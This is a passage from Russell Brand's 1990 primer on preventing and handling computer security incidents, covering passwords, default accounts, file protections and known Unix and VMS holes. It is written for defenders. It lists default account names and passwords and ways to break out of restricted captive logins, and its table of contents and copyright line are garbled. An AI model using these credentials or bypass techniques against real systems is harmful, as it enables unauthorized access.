Coping with the Threat of Computer Security Incidentys, by Russell L. Brand (June 8, 1990)

Coping with the Threat of Computer Security Incidents

A Primer from Prevention through Recovery

Russell L. Brand ?

June 8, 1990

Abstract

As computer security becomes a more important issue in
modern society, it begins to warrant a systematic
approach. The vast majority of the computer security
problems and the costs associated with them can be
prevented with simple inexpensive measures. The most
important and cost effective of these measures are
available in the prevention and planning phases. These
methods are presented followed by a simplified guide to
incident handling and recovery.

—————————
?Copyright ?c Russell L. Brand 1989, 1990 Permission to copy
granteddprovidede eachscopyfincludes attributionoand the pversion
information. This permission extends for one year minus one day
from June 8, 1990; past that point, the reader should obtain a
newer copy of the article as the information will be out of date.

0

Contents

1 Overview 4

2 Incident Avoidance 5

2.Passwords :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: : 5

2.1Joe’s :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: : 6

2.1Same Passwords on Different Machines :: :: :: :: :: :: : 6

2.1Readable Password Files :: :: ::: :: :: :: :: :: :: :: : 7

2.1Many faces of a person : :: :: ::: :: :: :: :: :: :: :: : 9

2.1Automated Checks for Dumb Passwords : :: :: :: :: :: :: : 9

2.1Machine Generated Passwords :: ::: :: :: :: :: :: :: :: :10

2.1The Sorrows of Special Purpose Hardware :: :: :: :: :: :12

2.1Is Writing Passwords Down that Bad? : :: :: :: :: :: :: :13

2.1The Truth about Password Aging ::: :: :: :: :: :: :: :: :13

2.1How do you change a password : ::: :: :: :: :: :: :: :: :13

2.Old Password Files :: :: :: :: :: ::: :: :: :: :: :: :: :: :14

2.Dormant Accounts : :: :: :: :: :: ::: :: :: :: :: :: :: :: :14

2.3VMS :: :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :14

2.Default Accounts and Objects : :: ::: :: :: :: :: :: :: :: :14

2.4Unix : :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :16

2.4VMS :: :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :17

2.4CMS :: :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :18

2.File Protections : :: :: :: :: :: ::: :: :: :: :: :: :: :: :18

2.Well Known Security Holes : :: :: ::: :: :: :: :: :: :: :: :19

2.New Security Holes :: :: :: :: :: ::: :: :: :: :: :: :: :: :20

1

2.7CERT : :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :20

2.7ZARDOZ :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :21

2.7CIAC : :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :21

2.Excess Services :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :21

2.Search Paths :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :21

2.Routing : :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :21

2.Humans :: :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :22

2.1Managers :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :22

2.1Secretaries :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :22

2.1Trojan Horses : :: :: :: :: :: ::: :: :: :: :: :: :: :: :22

2.1Wizards : :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :23

2.1Funders : :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :23

2.Group Accounts :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :23

2..rhosts and proxy logins :: :: :: ::: :: :: :: :: :: :: :: :24

2.Debugging :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :24

2.Getting People Mad at You : :: :: ::: :: :: :: :: :: :: :: :24

3 Pre-Planning your Incident Handling 25

3.Goals: :: :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :25

3.1Maintaining and restoring data ::: :: :: :: :: :: :: :: :25

3.1Maintaining and restoring service :: :: :: :: :: :: :: :26

3.1Figuring how it happenned : :: ::: :: :: :: :: :: :: :: :26

3.1Avoiding the Future Incidents and Escalation : :: :: :: :26

3.1Avoiding looking foolish :: :: ::: :: :: :: :: :: :: :: :27

3.1.Finding out who did it :: :: ::: :: :: :: :: :: :: :: :27

2

3.1Punishing the attackers :: :: ::: :: :: :: :: :: :: :: :27

3.Backups : :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :27

3.2Why We Need Back Ups :: :: :: ::: :: :: :: :: :: :: :: :28

3.2How to form a Back Up Strategy that Works : :: :: :: :: :29

3.Forming a Plan :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :30

3.Tools to have on hand :: :: :: :: ::: :: :: :: :: :: :: :: :31

3.Sample Scenarios to Work on in Groups :: :: :: :: :: :: :: :31

4 Incident Handling 33

4.Basic Hints: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :33

4.1Panic Level :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :33

4.1Call Logs and Time Lines :: :: ::: :: :: :: :: :: :: :: :33

4.1Accountability and Authority : ::: :: :: :: :: :: :: :: :33

4.1Audit Logs : :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :33

4.1Timestamps : :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :34

4.Basic Techniques : :: :: :: :: :: ::: :: :: :: :: :: :: :: :34

4.2Differencing :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :34

4.2Finding : :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :34

4.2Snooping :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :34

4.2Tracking :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :34

4.2Psychology : :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :34

4.Prosecution: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :35

4.Exercise: :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :35

5 Recovering From Disasters 36

A Micro Computers 36

3

B VMS Script 39

C Highly Sensitive Environments 42

D Handling the Press 44

D.Spin Control :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :44

D.Time Control :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :44

D.Hero Making: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :44

D.Discouraging or Encouraging a Next Incident :: :: :: :: :: :45

D.Prosecution: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :45

D.No Comment : :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :45

D.Honesty : :: :: :: :: :: :: :: :: ::: :: :: :: :: :: :: :: :45

E Object Code Protection 46

F The Joy of Broadcast 47

G Guest Accounts 48

G.Attack Difficulty Ratios :: :: :: ::: :: :: :: :: :: :: :: :48

G.Individual Sponsors : :: :: :: :: ::: :: :: :: :: :: :: :: :48

G.The No Guest Policy : :: :: :: :: ::: :: :: :: :: :: :: :: :48

H Orange Book 49

I Acknowledgements 50

4

1 Overview

Since 1984, I have been periodically distracted from my
education, my research and from my personal life to help handle
computer emergencies. After presenting dozens of papers,
tutorials talks on computer security, Roger Anderson and George
Michale arranged for me to lead a one day intensive seminar on
the practical aspects of computer security in an unclassified
networked environment for IEEE Compcon. This primer was written
as a basic text for this type seminar and has been used for about
2 dozen of them in the past year , and is still in draft form.

The text is divided into four main sections with a number of
appendices. The first two major sections of this document
contain the material for the morning lecture. The two following
sections contain the afternoon lecture contain the afternoon’s
material. The remaining appendices include material that is of
interest to those people who have to deal with other computer
security issues.

Since this primer is a direct and simple “how to guide” for
cost-effective solutions to computer security problems, it does
not contain as many stories and examples as my other tutorials.
Those readers interested in these stories or who are having
difficulty convincing people in their organization of the need
for computer security are referred to Attack of the Tiger Team,
when it becomes available. and those readers interested in
comprehensive list of computer security vulnerabilities should
contact the author regarding the Hackman project.

Suggestions, questions and other comments are always welcome.
Please send comments to primer@cert.sei.cmu.edu. I hope to
publish a this set of notes in a more complete form in the
future. When sending comments or questions, please mention that
you were reading version CERT 0.6 of June 8, 1990.

Russell L. Brand
brand@lll-crg.llnl.gov
1862 Euclid Ave, Suite 136
Berkeley, CA 94709

5

2 Incident Avoidance

“An ounce of prevention is worth a pound of cure.” In computer
security this is an understatement by a greater factor than can
be easily be believed. Very little has historically been done to
prevent computer break-ins and I have been told by a number of
the country’s top computer scientists that “Computer Security is
a waste of time.” The belief that security measures or
preventive medicine is a waste has led to giant expenditures to
repair damage to both computers and people respectively. Must of
my surprise, several system managers reviewing this document were
sure that even basic preventative measures would not be cost
effective as compared to repairing disasters after they occurred.

The vast majority of the security incidents are caused by one of
about a dozen well understood problems. By not making these
mistakes, you can prevent most of the problems from happening to
your systems and avoid untold hassles and losses. Almost every
site that I survey and almost every incident that did not involve
insiders was caused by one of these problems. In the most of the
insider cases, no amount of computer security would have helped
and these are in many ways demonstrated problems with physical
security or personnel policy rather than with computer security
per se.

Most of the security incidents are caused by “attackers” of
limited ability and resources. Because of this and because there
are so many easy targets, if you provide the most basic level of
protection, most of the attackers will break into some other site
instead of bothering yours. There are of course exceptional
cases. If you are believed to have highly sensitive information
or are on a “hit list” of one type or another, you may
encounter more dedicated attackers. Readers interested in more
comprehensive defensive strategies should consult the appendices.

Over all, prevention of a problem is about four orders of
magnitude cheaper than having to handling it in the average case.
Proper planning can reduce the cost of incident handling and
recovery and is discussed in the section on planning. In
addition to whatever other measures are taken, the greatest
incremental security improvement will be obtained be implementing
the simple measures described below.

6

2.1 Passwords

While “good passwords” is not a hot and sexy topic and will
never command the prestige of exploitable bugs in the operating
system itself, it is the single most important topic in incident
prevention. Doing everything else entirely correctly is almost
of no value unless you get this right!

2.1.1 Joe’s

A “Joe” is an account where the username is the same as the
password. This makes the password both easy to remember and easy
to guess. It is the single most common cause of password
problems in the modern world.

In 1986, there was popular conjecture that every machine had a
Joe. There was fair amount of random testing done and in fact a
Joe was found on each and every machine tested. These included
machines that had password systems designed to prevent usernames
from being used as passwords.

This summer, while I was testing a series of sensitive systems,
where hundred of thousands of dollars were spent to remove
security holes including re-writing a fair fraction of the
operating system, there were Joes.

It is worthwhile to include a process in your system batching
file (cron on unix) to check for Joes explicitly. The most
common occurrences of Joes is the initial password that the
system administrators set for an account which has never been
changed. Often this initial password is set by the administrator
with the expectation the user will change it promptly. Often the
user doesn’t know how to change it or in fact never logs in at
all. In the latter case a dormant account lies on the system
accomplishing nothing except wasting system resources and
increasing vulnerabilities.

2.1.2 Same Passwords on Different Machines

Many years ago when a computing center had a single mainframe the
issue of a user having the same password on multiple machines was
moot. As long the number of machines that a user accessed was
very small, it was reasonable to request that a person to use a
different password on each machine or set of machines. With a

7

modern workstation environment, it is no longer practical to
expect this from a user and a user is unlikely to comply if
asked. There are a number of simple compromise measures that can
and should be taken.

Among these measures is requesting that privileged users have
different passwords for their privileged accounts than for their
normal use account and for their accounts on machines at other
centers. If the latter is not the case, then anyone who gains
control of one of these “other” machines which you have no
control over, has gained privileged access to yours as well.

The basic question of when passwords should be the same is
actually a simple one. Passwords should be the same when the two
machines are (1) logically equivalent (as in a pool of
workstations), (2) “trust each other” to the extent that
compromising one would compromise the others in other ways, or
(3) are run by the same center with the same security measures.
Passwords should be different when the computers are (1) run by
different organizations, (2) have different levels of security or
(3) have different operating systems.

Lest this seems too strict, be assured that I have on several
occasions broken into machines by giving privileged users on the
target machines accounts on one of my own and exploiting their
use of the same password on both. Further, machines with
different operating systems are inherently vulnerable to
different “programming bugs” and hence by having the same
passwords on the two machines, each machine is open to the all
the bugs that could exist on either system.

It is interesting (but of little practical value) to note that an
attacker can gain a cryptographic advantage by having two
different encrypted strings for the same password. This would
happen when the user has the same password on two machines but it
has been encrypted with different salts. In principle, this
makes hostile decryption much easier. In practice, the attack
methods that are most often used do not exploit this.

The worst offenders of the “shared password problem” are
network maintenance people and teams. Often they want an account
on every local area net that they service, each with the same
password. That way they can examine network problems and such
without having to look up hundreds of passwords.

While the network maintainers are generally (but not always) good
about picking reasonable passwords and keeping them secret, if
any one machine that they are using has a readable password file

8

(discussed below) or is ever compromised, this password is itself
compromised and an attacker can gain unauthorized access to
hundreds or thousands of machines.

2.1.3 Readable Password Files

A readable password file is an accident waiting to happen. With
access to the encrypted password an attacker can guess passwords
at his leisure without you being able to tell that he is doing
so. Once he has a correct password, he can then access your
machine as that user. In the case of certain operating systems,
including older versions of VMS, there is a well know inversion
for the password encryption algorithm and hence the attacker
doesn’t need to guess at all once he can read the password file.

Changing the encryption method to some other method that is also
publically known doesn’t help this set of problems, even if the
crypto-system itself is much stronger. The weakness here is not
in the crypto-system but rather in the ease of making guesses.

It is vital to protect your password file from being read. There
are two parts to this. First you should prevent anonymous file
transfers from be able to remove a copy of the password file.
While this is generally very easy to do correctly, there is a
common mistake worth avoiding. Most file transfer facilities
allow you to restrict the part of the file system from which
unauthenticated transfers can be made. It is necessary to put a
partial password file in this subsection so that an anonymous
agent knows “who it (itself) is”. Many sites have put complete
password files here defeating one of the most important purposes
of the restrictions. (Of course without this restriction “World
Readable” takes on a very literal meaning:::)

The second part of the solution is somewhat harder. This is to
prevent unprivileged users who are using the system from reading
the encrypted password from the password file. The reason that
this is difficult is that the password file has a great deal of
information that people and programs need in it other than the
passwords themselves. Some version of some operating systems
have privileged calls to handle the details of all this and hence
their utilities have already been written to allow protection of
the encrypted passwords.

Most of the current versions of Unix are not among of these
systems. Berkeley has distributed a set of patches to
incorporate this separation (called shadow passwords) and the

9

latest version of the SunOS has facilities for it. For those who
are using an operating system that does not yet have shadow
passwords and cannot use one of the new releases, a number of ad
hoc shadowing systems have been developed. One can install
shadow passwords by editing the binaries of /bin/login,
/bin/passwd and similar programs that actually need to use the
password fields and then modify /etc/vipw to work with both the
diminished and shadow password files.

Of course, since most of us use broadcast nets, there is a real
danger of passwords being seen as they go over the wire. This
class of problems is discussed in the the Joys of Broadcast
appendix and the Guests appendix.

Kerberos, developed at MIT’s Athena project has an alternative
means of handling passwords. It allows one to remove all the
passwords from the normal use machines and to never have them
broadcasted in clear text. While Kerberos is vulnerable to a
number of interesting password guessing and cryptographic attacks
and currently has problems with multi-home machines (Hosts with
more than one IP address), it does provide the first practical
attempt and network security for a university environment.

An often overlooked issue is that of passwords for games. Many
multiplayer computer games, such as “Xtrek” and “Empire”
require the user to supply a password to prevent users from
impersonating one another during the game. Generally these
passwords are stored by the game itself and are in principle
unrelated to the passwords that the operating system itself uses.
Unfortunately, these passwords are generally stored unencrypted
and some users use the same password as they do for logging into
the machine itself. Some games now explicitly warn the users not
use his login passwords. Perhaps these games will eventually
check that the password is indeed not the same as the login
password.

2.1.4 Many faces of a person

A single individual can have many different relationships to a
computer at different times. The system programmers are acting
as “just users” when they read their mail or play a computer
game. In many operating systems, a person gets all of his
privileges all of the time. While this is not true in Multics,
it is true in the default configuration of almost every other
operating system. Fortunately a computer doesn’t know anything
about “people” and hence is perfectly happy to allow a single

10

person have several accounts with different passwords at
different privilege levels. This helps to prevent the
accidentally disclosure of a privileged password. In the case
where the privileged user has his unprivileged account having the
same password as his unprivileged account on other machines it
will at least be the case that his privileges are not compromised
when and if this other machine is compromised.

The one case where it is especially important to have separate
accounts or passwords for a single individual is for someone who
travels to give demos. One can be assured that his password will
be lost when he is giving a demo and something breaks. The most
common form of “breakage” is a problem with duplex of of delay.
It would nice if all that was lost was the demo password and for
the demo password to be of no use to an attacker.

2.1.5 Automated Checks for Dumb Passwords

Automated checks for dumb passwords come in three varieties. The
first is to routinely run a password cracker against the
encrypted passwords and notice what is caught. While this is a
good idea, it is currently used without either of the other two
mechanisms we will describe. Since it is computationally less
efficient than the others by about a factor of 50,000, it should
be used to supplement the others rather than be used exclusively.
Among its many virtues is that an automated checking system that
reads the encrypted passwords does not require having source for
the operating system or making modification an system
modifications.

The second method of preventing dumb password is to alter the
password changing facility so that it doesn’t accept dumb
passwords. This has two big advantages over the first method.
The first of these is computational. The second is more
important. By preventing the user from selecting the poor
password to begin with, one doesn’t need an administrative
procedure to get him to change it later. It can all happen
directly with no human intervention and no apparent
accountability. As a general rule, people are not happy about
passwords and really don’t want to hear from another person that
they need to change their password yet again.

While this change does require a system modification, it can
often be done without source code by writing a pre-processor to
screen the passwords before the new password is passed to the
existing utilities. The weakness in this approach lies with the

11

users who are not required to use the new style of password
facility. As a result, one finds that facilities that use only
this method have good passwords for everyone except the system
staff and new users who have had their initial passwords set by
the system staff.

The third method is designed primarily to catch the bad passwords
that are entered in despite the use of the second method. Once
could check the “dumbness” of a password with each attempted
use. While this is computationally more expensive than the
second method, it generally catches everyone. Even the system
programmers tend to use the standard login utility. It has the
nice feature of locking out anyone that finds a way to circumvent
the second method. This generally requires a small amount of
system source and risks causing embarrassment to “too clever”
system staff members.

In terms of dumb passwords, there are a number of “attack
lists”. An attack list is a list of common passwords that an
attacker could use to try to login with. Several of these have
been published and more are constantly being formed. These lists
are used for the automated password guesser and they may also be
used directly in the second and third method described above.
With the second and third method one may also use criteria
including minimum length, use of non-alphabetic characters, etc.
Finally, information about the individual user found in standard
system files can be scanned to see if the user has incorporated
this information into his password.

2.1.6 Machine Generated Passwords

Most users hate machine generated passwords. Often they are
unrememberable and accompanied by a warning to “Never write them
down” which is a frustrating combination. (We will discuss the
the writing down of passwords later.) Machine generated
passwords come in four basic types

Gibberish. This is the most obvious approach to randomness.
Independently selected several characters from the set of
all printable characters. For a six character password,
this gives about 40 bits of randomness. It is very hard to
guess and perhaps even harder to remember.
Often a little bit of post processing is done on these
passwords as well as on the random syllables discussed
below. This post processing removes passwords that might

12

prove offensive to the user. When a potentially offensive
password is generated, the program simply tries again. The
user often behaves the same way and runs the randomizer over
and over again until a password that seems less random and
more memorable to him is selected. In principle, the clever
user could write a program that kept requesting new random
passwords until an English word was chosen for him; this
would take much too long to be practical.

Numbers. Numbers are a lot like letters. People don’t try to
pronounce them and there are very few numbers that are
“offensive” per se. An eight digit random number has
about 26 bits of randomness in it and is of comparable
strength to a 4 character random password chosen from the
unrestricted set of printable characters. (The amount of
randomness in a password is the log (base 2) of the number
of possible passwords if they were all equally likely to
occur.)
Eight digit numbers are hard to remember. Fortunately
“chunking” them into groups (as 184—25—7546) makes
this less difficult than it would otherwise be.

Syllables. This is by far the most common method currently used.
The idea is to make non-words that are easy to remember
because they sound like words. A three syllable, eight
letter non-word often has about 24 bits of randomness in it
making it not quite as strong as an 8 bit number but
hopefully a little bit more memorable.
The principle here is good. In fact, this pseudo-word idea
should work very well. In practice it fails miserably
because the standard programs for generating these
pseudo-syllables are very poor. Eventually we may find a
good implementation of this and see a higher level of user
acceptance.

Pass Phrases. Pass phrases are the least common way to implement
machine generated passwords. The idea here is very simple.
Take 100 nouns, 100 verbs, 100 adjective and 100 adverbs.
Generate an eight digit random number. Consider it as four
2 digit random numbers and use that to pick one of each of
the above parts of speech. The user is then given a phrase
like “Orange Cars Sleep Quickly.” The words within each
list are uniquely determined by their first two characters.
The user may then type the phrase, the first few letters of
each word or the eight digit number.
The phrases are easy to remember, the system remains just as
secure if you publish the list of words and has about 26
bits of randomness. One can adapt the system down to three

13

words with 20 bits of randomness and still be sufficiently
safe for most applications.

I believe that machine generated passwords are generally a bad
solution to the password problem. If you must use them, I
strongly urge the use of pass-phrases over the other methods. In
any event, if your center is using machine generated passwords,
you should consider running an occasional sweep over the entire
user file system looking for scripts containing these passwords.
Proper selection of your password generation algorithm can make
this much easier than it sounds.

As with almost all password issues, the user of a single computer
center which gives him one machine generated password for access
to all the machines he will use will not have nearly the level of
difficulty as the user who uses computers at many centers and
might have to remember dozens or even hundreds of such passwords.

2.1.7 The Sorrows of Special Purpose Hardware

With the problems of broadcast networks and user selecting bad
passwords or rebelling at machine generated password, some
facilities have turned to special purpose hardware that generates
keys dynamically. Generally these devices look like small
calculators (or smart card) and when a user enters a short
password (often four digits) they give him a password that is
good for a single use. If the person wants to login again, he
must get a new password from his key-generator.

With a few exceptions, the technology of these devices works very
well. The exceptions include systems with bad time
synchronization, unreliable or fragile hardware or very short
generated keys. In at least one case the generated keys were so
short that it was faster to attack the machine by guessing the
password “1111” than by guessing at the user generated
passwords it replaced.

Despite the technology of these devices working well and the
installation generally being almost painless, there are two
serious problems with their use. The first is cost. Buying a
device for a user of large center can easily cost more than an
additional mainframe. The second problem is more serious. This
is one of user reluctance. Most users are unwilling to carry an
extra device and the people who are users of many centers are
even less willing to hold a dozen such devices and remember which
is which.

14

In one center, these devices were used only for privileged
accesses initiated from insecure locations. Only a handful of
them had to be made. (Being innovative, the center staff built
them from old programmable calculators.) They were used only by
the “on call” system programmer when handling emergencies and
provided some security without being to obtrusive.

2.1.8 Is Writing Passwords Down that Bad?

One of the first things that we were all told when we began using
timesharing is that one should never write down passwords. I
agree that the users should not record their passwords on-line.
There have been a large number of break-ins enable by a user
having a batch script that would include a clear-text password to
let them login to another machine.

On the other hand, how often has your wallet been stolen? I
believe that a password written down in wallet is probably not a
serious risk in comparison to other the problems including the
selection of “dumb” password that are easier to remember. In
classified systems, this is, of course, not permitted.

2.1.9 The Truth about Password Aging

Some facilities force users to change their passwords on a
regular basis. This has the beneficial side effect of removing
dormant accounts. It is also the case that it limits the utility
of a stolen password.

While these are good and worthwhile effects, most system
administrators believe that changing passwords on a regular basis
makes it harder for an attacker to guess them. In practice, for
an attacker that has gotten the crypt text of the password file,
he generally only needs a few hours to find the passwords of
interest and hence frequent changes do not increase the
difficulty of his task. For the attacker who is guessing without
a copy of the encrypt password, even changing the password every
minute would at most double the effort he would be required to
expend.

15

2.1.10 How do you change a password

Users should be told to change their passwords whenever they have
reason to expect that another person has learned their passwords
and after each use of an “untrusted” machine. Unfortunately
many users are neither told this, nor how to change the password.
Be sure both to tell you users how to change their passwords and
include these instructions in the on-line documentation in an
obvious place. Users should not be expected to realize the
password changing is (1) an option for directory maintenance
under TOPS-20 and many versions of CMS, (2) is spelled passwd
under unix or (3) is an option to set under VMS.

2.2 Old Password Files

It is often the case at sites running shadow password systems,
someone forgets to prevent the shadow password file from being
publically readable. While this is easy to prevent by having a
batch job that routinely revokes read permissions that were
accidently granted, there is an interesting variant of this
problem that is harder to prevent.

When password files are edited, some editors leave backup files
that are publically readable. In fact when a new system is
installed a password file is often created by extracting
information from the password files of many existing systems.
The collection of password files is all too often left publically
readable in some forgotten disk area where it is found by an
attacker weeks or months later. The attacker then uses this data
to break into a large number of machines.

2.3 Dormant Accounts

While requiring annual password changes does eventually remove
dormant accounts, it is worthwhile to try a more active approach
for their removal. The exact nature of this approach will vary
from center to center.

2.3.1 VMS

In VMS, the account expiration field is a good method of retiring
dormant accounts, but care should be taken as no advance notice

16

is given that an account is near expiration.

Also VMS security auditing makes the removal of expired users a
bad idea. Because one of the most common errors is typing the
password on the username line, DEC suppresses any invalid
username from the logs until a breaking attempt is detected. But
if the username is valid and the password wrong, the username is
logged.

2.4 Default Accounts and Objects

One of the joys of many operating systems is that they come
complete with pre-built accounts and other objects. Many
operating systems have enabled either accounts or prelogin
facilities that present security risks.

The standard “accounts” for an attacker to try on any system
include the following:

Open. A facility to automatically create new accounts. It is
often set by default to not require either a password or
system manager approval to create the new accounts.
Help. Sometimes the pre-login help is too helpful. It may
provide phone numbers or other information that you wouldn’t
want to advertise to non-users.

Telnet. Or Terminal. An account designed to let someone just use
this machine as a stepping stone to get to another machine.
It is useful for hiding origins of an attack.

Guest. Many operating systems are shipped with guest accounts
enabled.
Demo. Not only are several operating systems shipped with a demo
account, but when installing some packages, a demo account
is automatically created. All too often the demo account
has write access to some of the system binaries (executable
files).

Games. Or Play. Often the password is Games when the account
name is Play. In some cases this account has the ability to
write to the Games directory allowing an attacker to not
only play games, and snoop around, but to also insert Trojan
horses at will.

Mail. Quite often a system is shipped with or is given an
unpassworded mail account so that people can report problems

17

(like their inability to login) without logging in. In
two-thirds of the systems that I have observed with such an
account, it was possible to break into the main system
through this account.

Often these default accounts are normal accounts with an
initialization file (.login, .profile, login.cmd, login.bat,
etc.) or alternate command line interpreter to make it do
something non-standard or restrict its action. These are
generally called, “Captive Accounts” or “Turnkey Logins.”
Setting up a restricted login so that it stays restricted is very
hard. It should of course be very easy, but in most cases a
mistake is made.

Subjobs. It is often the case that a restricted account is set up
to only run a single application. This single application
program is invoked by a startup script or instead of the
standard command interpreter. Very often this program has
an option to spawn a subprocess.
In some cases this might be an arbitrary job (e. g. the
/spawn option to Mail in VMS or “:!” to vi in unix) or
might be limited to a small number of programs. In the
former case the problem is immediate, in the latter case, it
is often the case that one of these programs in turn allows
arbitrary spawning.
A carefully written subsystem will prevent this (and all
other such problems). Generally these subsystems are
created quickly rather than carefully.

Editors. Most editors are sufficiently powerfully that if the
restricted system can use an editor, a way can be found to
cause problems.

Full Filenames. Many restricted subsystems presume that by
resetting the set of places the command interpreter looks
for executable programs (called its “search path”)
functionality can be restricted. In unix this might be done
by altering the Path variable or the logical names table in
VMS.
All too often the clever attacker is able to defeat this
plan by using the complete filename of the file of interest.
Sometimes non-standard names for the file are necessary to
circumvent a clever restriction program.

Removable Restriction Files. When a system relies on an
initialization file to provide protection, it is important
that this file cannot be altered or removed. If an

18

restricted application is able to write to its “home
directory” where these initialization files are kept it can
often free itself.

Non-standard Login. Some network access methods do not read or
respect the startup files. Among these are many file
transfer systems. I have often been able to gain privileged
access to a machine by using the the login and password from
a captive account with the file transfer facility that
didn’t know that these accounts weren’t “normal.” Many
file transfer facilities have methods for disabling the use
of selected accounts.

Interrupts. It is sad that a number of the captive accounts won’t
withstand a single interrupt or suspend character. Try it
just to be sure.

Making sure that you have not made any of the above listed
mistakes is of course not sufficient for having a perfectly safe
system. Avoiding these mistakes, or avoiding the use of captive
accounts at all, is enough to discourage the vast majority of
attackers.

Each operating system for each vendor has some particular default
accounts that need to be disabled or otherwise protected.

2.4.1 Unix

Under unix there are a lot of possible default accounts since
there are so many different vendors. Below is a partial list of
the default accounts that I have successfully used in the past
that are not mentioned above.

Sysdiag. Or diag. This is used for doing hardware maintenance
and should have a password.

Root. Or Rootsh or rootcsh or toor. All to often shipped without
a password.
Sync. Used to protect the disks when doing an emergency shutdown.
This account should be restricted from file transfer and
other net uses.

Finger. Or Who or W or Date or Echo. All of these have
legitimate uses but need to be set up to be properly
captive.

19

Among the things that one should do with a new unix system is

grep :: /etc/passwd

to see what unpassworded accounts exist on the system. All of
these are worth special attention.

2.4.2 VMS

Since VMS is available from only one vendor, the default account
here are better known. On large systems, these appear with
standard well known passwords. On smaller systems, these
accounts appear with no passwords at all. With the exception of
Decnet, all have been eliminated on systems newer than version
4.6.

Decnet

System
Systest

Field

UETP

Many of the networking and mail delivery packages routinely added
to VMS systems also have well know password. In the past six
months these accounts have been commonly used to break into VMS
systems.

MMPONY

PLUTO

The password on all of these accounts should be reset when a new
system is obtained. There are many problems with the DECNET
account and the with the Task 0 object. System managers should
obtain one of the standard repair scripts to remove these
vulnerabilities.

20

2.4.3 CMS

It has been many years since I have seriously used CMS. At last
glance the default configuration seemed to include well know
passwords for two accounts.

rcsc
operator

2.5 File Protections

With file protections simple measures can avoid most problems.
Batch jobs should be run on a regular basis to check that the
protections are correct.

Writable Binaries and System Directories. The most common problem
with file protections is that some system binary or
directory is not protected. This allows the attacker to
modify the system. In this manner, an attacker will alter a
common program, often the directory listing program to
create a privileged account for them the next time that a
privileged user uses this command.
When possible the system binaries should be mounted
read-only. In any event a program should systematically
find and correct errors in the protection of system files.
“Public” areas for unsupported executable should be
moderated and these executable should never be used by
privileged users and programs. System data files suffer
from similar vulnerabilities.

Readable Restricted System Files. Just as the encrypted passwords
need to be protected, the system has other data that is
worth protecting. Many computers have passwords and phone
numbers of other computers stored for future use. The most
common use of this type of information is for network mail
being transported via UUCP or protected DECNET. It is
difficult to rework these systems so that this information
would not be necessary and hence it must be protected. You
have an obligation to protect this data about your neighbors
just as they have a responsibility to protect similar data
that they have about you.

Home Dir’s and Init Files Shouldn’t Be Writable. Checking that
these directories and files can be written only by the owner

21

will prevent many careless errors. It is also worthwhile to
check that peoples mail archives are not publically
readable. Though this is not directly a security threat, it
is only one more line of code while writing the rest of
this.

In many versions of the common operating systems special
checks are placed in the command interpreters to prevent
them from using initialization files that were written by a
third party. In this case there are still at least two
types of interesting attacks. The first is to install a
Trojan horse in the person’s home directory tree rather than
in the initialization file itself and the second is to
simple remove the initialization files themselves. Often
security weaknesses are remedied through the proper
initialization file and without these files the
vulnerabilities are re-introduced.
No Unexpected Publically Writable Files or Directories. There are
of course places and individual files that should be
publically writable but these are stable quantities and the
script can ignore them. In practice user seems to react
well to being told about files that they own that are
publically overwritable.

When Parents aren’t Owners. While it is not unusual for someone
to have a link to a file outside of his directory structure,
it is unusual for there to be a file to be in his home
directory that is owned by someone else. Flagging this when
the link-count is “1” is worthwhile.

Automated scripts can find these errors before they are
exploited. In general a serious error of one of the types
described above is entered into a given cluster university system
every other week.

2.6 Well Known Security Holes

While hundreds of security holes exist in commonly used programs,
a very small number of these account for most of the problems.
Under modern version of VMS, most of them relate to either DECNET
or creating Mailboxes.

Under unix, a handful of programs account for most of the
problems. It is not that these bugs are any worse or easier to
exploit than the others, just that they are well known and

22

popular. The interested reader is referred to the Hackman
Project for a more complete listing.

Set-Uid Shell Scripts. You should not have any set-uid shell
scripts. If you have system source, you should consider
modifying chmod to prevent users from creating set-uid
programs.

FTP. The file transfer utilities has had a number of problems
both in terms of configuration management (remembering to
disallow accounts like “sync” from being used to transfer
files) and legitimate bugs. Patched version are available
for most systems.
Login on the Sun 386i and under Dec Ultrix 3.0, until a better
fix is available,

chmod 0100 /bin/login

to protect yourself from a serious security bug.
Sendmail. Probably the only program with as many security
problems as the yellowpages system itself. Again a patched
version should be obtained for your system.

TFTP. This program should be set to run as an unprivileged user
and/or chrooted.

Rwalld. This program needs to be set to run as an unprivileged
user.
Mkdir. Some versions of unix do not have an atomic kernel call to
make a directory and hence can leave the inodes in a “bad”
state if it is interrupted at just the right moment. If
your system is one of these it is worthwhile to write a
